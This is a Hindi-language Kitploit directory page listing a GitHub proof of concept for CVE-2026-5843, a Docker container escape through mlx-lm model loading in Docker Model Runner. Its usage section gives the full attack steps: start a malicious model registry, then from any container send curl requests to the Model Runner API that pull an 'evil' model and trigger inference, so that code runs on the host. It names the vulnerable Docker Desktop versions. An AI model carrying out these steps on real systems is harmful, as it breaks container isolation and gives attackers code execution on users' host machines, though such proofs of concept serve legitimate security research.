Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-5843 — mlx-metal importlib के माध्यम से Docker कंटेनर एस्केप POC | Kitploit
उपकरण/GitHubGitHub/davidrxchester/cve-2026-5843
कंटेनर सुरक्षाभेद्यता विश्लेषणशोषणरेड टीमिंगपेलोड डेवलपमेंटकंटेनर एस्केपAI सुरक्षा
GitHubdavidrxchester/cve-2026-5843

CVE-2026-5843

mlx-metal importlib के माध्यम से Docker कंटेनर एस्केप POC

रिपॉजिटरी देखें
3 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-5843 PoC

न्यूनतम OCI रजिस्ट्री जो mlx-lm में model_file importlib निष्पादन पथ का शोषण करने के लिए एक दुर्भावनापूर्ण मॉडल परोसती है। जब Docker Model Runner अनुमान के लिए मॉडल लोड करता है, model.py होस्ट पर लॉग-इन किए गए उपयोक्ता के रूप में निष्पादित होता है।

आवश्यक है: Docker Desktop ≤ 4.70.x (Apple Silicon) और Model Runner सक्षम होना चाहिए

उपयोग

root@kitploit:~
# 1. Start the registry on the host
python3 poc_cve_2026_5843.py

# 2. From any container on the Docker network
docker run -it --rm curlimages/curl sh

curl -X POST http://model-runner.docker.internal/api/pull \
  -H 'Content-Type: application/json' \
  -d '{"name":"localhost:5555/evil/model:latest"}'

curl --max-time 120 -X POST http://model-runner.docker.internal/engines/mlx/v1/chat/completions \
  -H 'Content-Type: application/json' \
  -d '{"model":"localhost:5555/evil/model:latest","messages":[{"role":"user","content":"hi"}]}'

आउटपुट होस्ट पर ~/Desktop/mlx.txt में लिखा जाता है।

पूरा विवरण: https://davidrochester.com/posts/container-escape-via-inference

संबंधित CVE

  • CVE-2026-5817 — vllm-metal trust_remote_code=True, समान हमला सतह, Docker Desktop 4.68.0 में पैच किया गया
टूल डाउनलोड करें